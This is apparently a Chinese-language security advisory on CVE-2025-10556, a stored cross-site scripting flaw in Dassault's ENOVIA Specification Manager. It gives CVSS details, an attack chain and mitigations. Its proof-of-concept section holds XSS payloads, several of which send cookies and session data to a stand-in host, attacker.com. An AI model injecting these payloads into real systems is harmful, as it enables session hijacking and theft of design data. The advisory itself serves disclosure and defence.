CVE-2025-10556：ENOVIA Specification Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-10556

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

ENOVIA Specification Manager（3DEXPERIENCE平台）

漏洞概述

CVE-2025-10556是存在于达索系统（Dassault Systèmes）3DEXPERIENCE平台ENOVIA Specification Manager组件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响从3DEXPERIENCE R2023x版本到R2025x版本的所有发布版本。

该漏洞由3DS Information Security团队发现并报告，CVSS 3.1评分为8.7分，属于高危级别漏洞。漏洞存在于ENOVIA Specification Manager的规范管理（Specification Management）功能中，允许具备低权限的攻击者通过注入恶意脚本代码到系统的规范管理模块，当其他用户（包括高权限用户）浏览受影响的页面时，恶意脚本将在其浏览器会话中执行。

由于该漏洞为存储型XSS，恶意脚本会被持久化存储在服务器端，这意味着每次有用户访问受影响的页面时，攻击载荷都会被自动执行，危害范围广泛。攻击者可以利用此漏洞窃取用户会话凭证、执行未授权操作、篡改页面内容或进行权限提升等攻击活动。由于该漏洞影响的是企业级PLM（产品生命周期管理）系统，可能导致敏感的产品设计数据、知识产权和商业机密面临泄露风险。

技术细节

存储型XSS漏洞的原理在于应用程序未能对用户输入进行充分的过滤和转义处理，导致恶意脚本被持久化存储在服务器端数据库中。当其他用户访问包含恶意内容的页面时，服务器将恶意脚本作为正常内容返回给浏览器，浏览器执行该脚本，从而实现攻击。

在ENOVIA Specification Manager的规范管理功能中，攻击者需要具备低权限的合法账户（PR:L），通过在规范相关的输入字段（如规范名称、描述、属性值等）中注入恶意JavaScript代码或HTML标签来实现存储。由于漏洞存在于规范管理模块，攻击者可以将恶意载荷嵌入到规范对象的各种文本字段中。

当其他用户（包括管理员）查看或编辑受感染的规范时，恶意脚本将在其浏览器上下文中执行。攻击向量为网络（AV:N），攻击复杂度低（AC:L），需要用户交互（UI:R）——即需要受害者访问包含恶意内容的页面。攻击影响范围发生变化（S:C），表明该漏洞可以影响其他安全域。

成功利用该漏洞后，攻击者可以实现以下攻击目标：1）窃取受害者会话Cookie，实现会话劫持；2）以受害者身份执行任意操作，如修改规范数据、访问受限信息；3）利用管理员权限进行权限提升；4）进行钓鱼攻击，诱导用户输入敏感凭据；5）结合CSRF等攻击技术执行更复杂的攻击链。机密性影响为高（C:H），完整性影响为高（I:H），可用性影响为无（A:N），表明该漏洞主要用于数据窃取和篡改，而非拒绝服务攻击。

攻击链分析

STEP 1

步骤1：获取初始访问

攻击者通过合法途径获取ENOVIA Specification Manager的低权限账户凭证，可以通过社会工程学、购买泄露凭据或利用其他漏洞获取。

STEP 2

步骤2：注入恶意脚本

攻击者登录系统后，导航至规范管理（Specification Management）功能模块，在规范的输入字段（如名称、描述、属性等）中注入精心构造的恶意JavaScript代码或HTML标签。

STEP 3

步骤3：持久化存储

由于漏洞缺乏对用户输入的适当过滤和输出编码，恶意脚本被持久化存储在服务器端的数据库中，与正常规范数据一同保存。

STEP 4

步骤4：触发执行

当其他用户（尤其是具有更高权限的用户如管理员）浏览或编辑包含恶意脚本的规范页面时，服务器将恶意内容作为正常响应返回，浏览器解析并执行其中的恶意脚本。

STEP 5

步骤5：数据窃取与权限提升

恶意脚本在受害者浏览器上下文中执行，可以窃取会话Cookie、获取敏感数据、以受害者身份执行操作，或利用管理员权限进行进一步的攻击活动。

STEP 6

步骤6：横向移动与数据外泄

利用获取的高权限账户，攻击者可以访问系统中的敏感产品设计数据、知识产权信息，并将数据外泄至攻击者控制的服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-10556: Stored XSS in ENOVIA Specification Manager -->
<!-- The vulnerability exists in Specification Management functionality -->
<!-- Attackers with low privileges can inject malicious scripts via specification fields -->

<!-- Example 1: Basic script injection in specification name field -->
<script>alert(document.cookie)</script>

<!-- Example 2: Event handler injection in specification description -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Example 3: SVG-based payload for specification attributes -->
<svg onload="var img=new Image();img.src='https://attacker.com/log?data='+btoa(document.cookie);">

<!-- Example 4: Full exploitation scenario using fetch API -->
<script>
  // Steal session and exfiltrate to attacker server
  var sessionData = {
    cookies: document.cookie,
    url: window.location.href,
    user: document.title
  };
  fetch('https://attacker.com/exfil', {
    method: 'POST',
    body: JSON.stringify(sessionData),
    headers: {'Content-Type': 'application/json'}
  });
</script>

<!-- Note: These payloads would be injected into specification management input fields -->
<!-- such as specification name, description, or custom attribute values -->

影响范围

3DEXPERIENCE R2023x

3DEXPERIENCE R2024x

3DEXPERIENCE R2025x

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制对ENOVIA Specification Manager规范管理功能的访问权限，仅允许可信用户使用；2）部署Web应用防火墙规则，检测和阻止常见的XSS攻击载荷；3）启用Content Security Policy，限制浏览器执行内联脚本；4）对所有用户输入进行严格的输入验证和输出编码；5）监控异常活动，特别是规范字段中包含HTML标签或JavaScript代码的可疑记录；6）将会话Cookie设置为HTTPOnly属性，降低Cookie被窃取的风险；7）定期审计规范管理模块中的数据，查找可能存在的恶意注入内容。